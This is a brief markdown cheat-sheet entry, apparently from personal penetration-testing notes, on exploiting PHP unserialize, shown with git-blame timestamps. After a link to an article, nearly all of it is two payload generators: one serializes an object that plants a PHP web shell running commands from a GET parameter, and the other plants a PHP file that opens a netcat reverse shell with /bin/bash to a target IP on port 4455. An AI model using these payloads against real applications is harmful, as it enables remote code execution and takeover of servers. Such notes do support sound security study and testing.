2021-11-24 23:52:42 +01:00
|
|
|
# Unserialize
|
|
|
|
|
|
2022-01-21 21:54:15 +01:00
|
|
|
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)
|
2021-11-24 23:52:42 +01:00
|
|
|
|
|
|
|
|
* Serialize via
|
|
|
|
|
```php
|
|
|
|
|
<?php
|
|
|
|
|
class FormSubmit {
|
|
|
|
|
public $form_file = 'messages.php';
|
|
|
|
|
public $message = '<?php
|
|
|
|
|
if(isset($_GET[\'cmd\']))
|
|
|
|
|
{
|
|
|
|
|
system($_GET[\'cmd\']);
|
|
|
|
|
}
|
|
|
|
|
?>';
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
print urlencode(serialize(new FormSubmit));
|
|
|
|
|
?>
|
|
|
|
|
```
|
2022-01-21 21:54:15 +01:00
|
|
|
|
|
|
|
|
```php
|
|
|
|
|
<?php class file
|
|
|
|
|
{
|
|
|
|
|
public $file = 'rev.php'; public $data = '<?php shell_exec("nc -e /bin/bash $TARGET_IP 4455"); ?>';
|
|
|
|
|
}
|
|
|
|
|
echo (serialize(new file));
|
|
|
|
|
?>
|
|
|
|
|
```
|
